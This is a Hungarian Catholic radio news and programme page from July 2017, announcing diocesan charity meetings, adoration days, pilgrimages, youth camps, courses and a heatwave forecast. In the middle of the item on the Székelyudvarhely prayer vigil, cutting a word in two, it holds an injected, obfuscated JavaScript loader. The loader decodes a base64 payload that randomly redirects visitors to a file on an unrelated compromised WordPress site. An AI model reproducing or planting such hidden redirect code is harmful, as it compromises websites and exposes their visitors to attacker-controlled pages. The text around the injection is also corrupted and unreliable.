2017. július 31. – Hírek és programajánló

H Í R E K   E S T E

A szeretetszolgálat-csoportok találkozója
Július 29-én, szombaton tartották a szatmárnémeti Szent István teremben találkozójukat a Szatmári Római Katolikus Egyházmegye plébániai szeretetszolgálat-csoportok képviselőinek a találkozóját. A rendezvényre Szatmárnémetiből, Nagybányáról, Máramarosszigetről, Nagykárolyból, Kálmándról, Mezőfényről, Felsőbányáról, Batizról és Krasznabéltről, összesen tizenhét csoporttól érkeztek plébániai szeretet-szolgálat képviselők. A plébániai szeretetszolgálat-csoportok Krisztus szeretetéből táplálkozva akarnak részt venni a szeretet alkotásaiban is, idejükből és erejükből áldozva a tevékeny segítségnyújtásra. A szombati találkozó lehetőséget adott az egyházmegye különböző pontjain tevékenykedő csoportok képviselőinek a tapasztalatcserére, de a lélekben való gazdagodásra is. Az előadás után Gáspár Annamária kórházpasztorációs referens moderálásában számoltak be jelen tevékenységükről, de megosztották örömeiket, nehézségeiket is, és közös imával zárták az éves találkozót – tudósított Józsa János sajtóreferens.

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében holnap Alsótömösön  tartják az örökös szentségimádási napot. Szánjunk időt a szentséglátogatásra, fejezzük ki ily módon is Krisztushoz való hűségünket és ragaszkodásunkat.

Medjugorjei Ifjúsági Fesztivál 2017
Augusztus 1-6 között rendezik meg a 28. Ifjúsági Fesztivált Medjugorjéban. Az idei programban is szerepelnek a napi katekézisek, tanúságtételek, rózsafüzér imák és szentmisék. Rádiónk élő közvetítéssel jelentkezik a helyszínről a találkozó teljes időtartama alatt. Holnap este hét órakor bekapcsolódhatnak a rózsafüzér imába, majd nyolc órától közvetítjük a fesztivál ünnepélyes megnyitóját. Naponta délelőtt 10 és 13 óra között jelentkezünk, illetve délután 17 és 22 óra között (a részletes programot az internetes oldalunkon a műsornaptárban lehet megtekinteni). Tartsanak velünk!

Zarándoklat Máriaradnára
Augusztus 2-án, a Porciunkula ünnepén a temesvári egyházmegye területén élő, valamint az időközben külföldre települt német nemzetiségű hívek és leszármazottaik zarándokolnak a máriaradnai bazilikához. Az ünnepi szentmisét délelőtt tizenegy órakor Roos Márton temesvári főpásztor celebrálja, szentbeszédet mond Harald Wechselberger németországi lelkipásztor. A szentmise zenei szolgálatát a reutlingeni Original Donauschwabischen Blaskapelle végzi, orgonán közreműködik Dr. Franz Metz bánsági származású, jelenleg Németországban élő orgonaművész.

Időjárás: Tovább fokozódik a hőség, holnap délután már 32-37 fokot mérhetünk. Kedden és szerdán szinte zavartalan napsütésre készülhetünk, felhő alig lesz az égen, csapadék nem várható. A hőhullámra kell elsősorban felkészíteni szervezetünket, mely kiemelten az időseket, kisgyermekeket, valamint a szívbetegeket, keringési és vérnyomás-problémákkal küszködőket viselheti meg. Igyunk cukor-, koffein- és alkoholmentes folyadékot, kerüljük a nehéz, zsíros ételek fogyasztását, gondoskodjunk bőrünk védelméről, viseljünk napszemüveget, kalapot!

MRE – Hírszolgálat, 2017. július 31.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai napon Gyulafehérváron, a ferences templomban tartják az örökös szentségimádási napot. Szánjunk időt a szentséglátogatásra, fejezzük ki ily módon is Krisztushoz való hűségünket és ragaszkodásunkat.

Zarándoklat Máriaradnára
Augusztus 2-án, a Porciunkula ünnepén a temesvári egyházmegye területén élő, valamint az időközben külföldre települt német nemzetiségű hívek és leszármazottaik zarándokolnak a máriaradnai bazilikához. Az ünnepi szentmisét délelőtt tizenegy órakor Roos Márton temesvári főpásztor celebrálja, szentbeszédet mond Harald Wechselberger németországi lelkipásztor. A szentmise zenei szolgálatát a reutlingeni Original Donauschwabischen Blaskapelle végzi, orgonán közreműködik Dr. Franz Metz bánsági származású, jelenleg Németországban élő orgonaművész.

Engesztelő imavirrasztás Székelyudvarhelyen
A Mária Rádió székelyudvarhelyi stúdiójának kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak, éjjel tizenegy órától pedig szentmisét mutatnak be. Augusztus 2-án, szerdán hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják fel.
A kápolnában minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádás is van. Várják az Istent imádni, engesztelni vágyókat.

Ifjúsági tábor és lelkigyakorlat Székelyszálláson
„Valaki mondja meg milyen az élet...” mottóval rendezik meg a XVI. ifjúsági tábort és lelkigyakorlatot Marosvásárhely mellett, Székelyszálláson, augusztus 11-15 között. Bővebb információk a 0742-698166-os telefonszámon kaphatóak Hajlák Attila kézdivásárhelyi segédlelkésznél.

Ferences Ösvény
Augusztus 11–13. között a Szárhegyi Ferences Kolostorban tartják a három hétvégéből álló Ferences Ösvény lelki programsorozat első találkozóját, amelyen Szent Ferenc életével és evangéliumi lelkiségével, vagyis a ferencességgel ismerkedhetnek meg a résztvevők. A programra – amelyen a helyek száma korlátozott – 17 és 35 év közötti fiatalokat várnak a szervezők. Jelentkezni, illetve a találkozó részleteiről érdeklődni Pantea Tibor ferences testvérnél lehetséges a 0746-774701 telefonszámon, vagy az frtibi@gmail.com e-mail címen.

Gyógynövény tanfolyam Udvarhelyszéken
50 órás gyógynövény-ismereti és felhasználási tanfolyamot szervez az Életminőségért Alapítvány Udvarhelyszéken, augusztus és október közötti periódusban. Az első találkozás Székelyudvarhelyen lesz, augusztus 12-én., szombaton, 9-17 óra között a Bethlen Gábor 73 szám alatt. Jelentkezési határidő: augusztus 8. Mivel a helyek száma korlátozott, ezért kérik, hogy a jelentkezéshez egy rövid motivációs levelet csatoljanak, amelyben megindokolják, hogy miért szeretnének részt venni a tanfolyamon. Ez alapján dől el, hogy ki vehet részt az ingyenes képzésen. Érdeklődni és jelentkezni Pakot Mónikánál lehet a 0745-570.005-ös telefonszámon.

Lelkinap a Szűzanyával
A Mária Iskola Lelki Család, a Rózsafüzér Társulatok, máriás lelkületű csoportok és lelkiségek XII. találkozóját augusztus 12-én tartják Székelyszálláson, a fatimai Szűzanya köszöntése alkalmából. A program reggel kilenc órakor a rózsafüzér elimádkozásával kezdődik, majd több elmélkedés következik, a Szűzanya fájdalmas, valamit örömútjának az imádkozása. A lelkinap az este hét órakor kezdődő szentmisével zárul. Az elmélkedéseket Hajlák Attila-István, kézdivásárhleyi segédlelkész tartja. Mindenkit várnak az imanapra.

Szatmári egyházmegyei ifjúsági tábor
„Ki vagyok én Uram?” mottóval szervezik meg a szatmári egyházmegye ifjúsági táborát augusztusz 21-26. között Szentegyházán. A résztvevőket színes programokkal várják a szervezők: lesznek sporttevékenységek, néptánc, kirándulás, túrázás, kézműves foglalkozások és természetesen lelki programok. Részvételi díj: 220 lej. Jelentkezni augusztus 4-ig lehet személyesen az Egyházmegyei Ifjúsági Irodánál a jelentkezési lappal és 100 lej előleggel. Egyéb információkat a 0261-717120-es telefonszámon kaphatnak.

Lelkigondozói kurzus Székelyudvarhelyen
A marosvásárhelyi Regnum Christi Alapítvány és a székelyudvarhelyi Forrás közösség szervezésében lelkigondozói kurzus lesz augusztus 31 – szeptember 3. között a székelyudvarhelyi Kis Szent Teréz plébánián. Jelentkezési határidő augusztus 10. Bővebb információt a www.regnumchristi.ro honlapon találnak.

MRE - Hírszolgálat, 2017. július 31.

About the author

maradmin

Leave a Comment